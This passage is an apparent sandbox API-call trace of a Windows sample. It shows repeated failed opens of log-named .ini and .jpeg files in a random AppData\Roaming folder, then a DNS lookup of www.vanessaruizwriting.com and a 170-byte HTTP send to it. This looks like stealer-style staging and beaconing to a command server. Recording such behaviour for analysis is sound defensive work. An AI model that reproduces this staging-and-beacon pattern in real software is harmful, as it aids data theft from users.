IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0162.655] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0162.655] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894fdf0) returned 1 [0162.655] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.655] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0162.655] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0162.655] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894ebf0) returned 1 [0162.655] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.655] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0162.656] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0162.656] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894ed10) returned 1 [0162.656] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.656] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0162.656] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0162.656] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894f3d0) returned 1 [0162.656] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.656] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0162.656] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0162.656] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894f3d0) returned 1 [0162.656] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.656] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0162.657] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0162.657] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894ebf0) returned 1 [0162.657] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.657] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0162.657] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0162.657] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894ebf0) returned 1 [0162.657] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.657] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0xffffffffffffffff, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0162.657] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0162.657] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894f3d0) returned 1 [0162.657] socket (af=2, type=1, protocol=6) returned 0x2540 [0162.658] getaddrinfo (in: pNodeName="www.vanessaruizwriting.com", pServiceName="80", pHints=0x8790d18*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x8790d48 | out: ppResult=0x8790d48*=0x77d5d10*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8884140*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.218"), ai_next=0x77d6010*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8884740*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.210"), ai_next=0x77d60d0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x88842e0*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.212"), ai_next=0x77d5310*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8884160*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.211"), ai_next=0x77d7b50*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x88840e0*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.216"), ai_next=0x77d8f90*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8884540*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.215"), ai_next=0x7870610*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8884720*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.217"), ai_next=0x0)))))))) returned 0 [0162.917] connect (s=0x2540, name=0x8884140*(sa_family=2, sin_port=0x50, sin_addr="198.54.117.218"), namelen=16) returned 0 [0163.105] send (s=0x2540, buf=0xa10808a*, len=170, flags=0) returned 170 [0163.106] setsockopt (s=0x2540, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0163.106] recv (in: s=0x2540, buf=0x107df040, len=2048000, flags=0 | out: buf=0x107df040) returned -1 [0163.288] closesocket (s=0x2540) returned 0 [0163.289] Sleep (dwMilliseconds=0x7d0) [0163.290] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.290] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0163.290] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0163.290] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892a0b0) returned 1 [0163.290] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.290] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0163.290] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0163.290] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8928a30) returned 1 [0163.290] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.290] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0163.290] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0163.291] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8928a30) returned 1 [0163.291] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.291] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0163.291] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0163.291] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8928fd0) returned 1 [0163.291] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.291] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0163.291] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0163.291] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x89297b0) returned 1 [0163.291] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.291] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0163.291] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0163.291] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8929f00) returned 1 [0163.291] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.291] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0163.291] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0163.291] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8928eb0) returned 1 [0163.291] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.291] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0163.291] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0163.292] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8928a30) returned 1 [0163.292] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.292] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0163.292] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0163.292] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8928a30) returned 1 [0163.292] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.292] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0163.292] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0163.292] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8929450) returned 1 [0163.292] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.292] NtCreateFile (in: 